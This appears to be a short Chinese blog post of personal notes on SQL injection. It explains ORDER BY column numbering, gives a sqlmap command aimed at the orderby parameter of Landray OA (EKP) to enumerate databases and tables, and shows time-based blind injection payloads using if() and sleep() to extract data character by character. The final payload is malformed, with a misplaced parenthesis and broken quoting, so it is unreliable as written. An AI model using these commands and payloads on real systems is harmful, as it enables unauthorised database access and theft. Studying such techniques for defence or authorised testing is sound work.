注入点扩展

1，order by 1是什么

select A,B ....... order by 1表示安A排序，order by 2 表示安B排序

asc表示升序，desc表示降序

2，蓝凌OA(EKP)的sql注入漏洞语句：sqlmap -r sql.txt -p orderby --dbs

sqlmap.py -r 从文件读取数据 -p 指定的参数 --tables

3，sql中的if怎么用？

if(条件,0,1)函数，当条件为真，返回0，假则返回1

多用于盲注，进行基于时间的盲注

?id=1'and if(1=1,sleep(6),1) ' 这里的1‘ and 1=1为真，延时6秒(延时时间短，可通过发F12--网络查看）

确定基于时间的盲注可以利用后，利用二分法猜解数据库的每个数据

如1' and if(ascii(substr(database(),1,1>95)),sleep(6),1 '

posted @ 2021-06-16 21:53 A思阅读(52) 评论(0) 编辑收藏举报

刷新页面返回顶部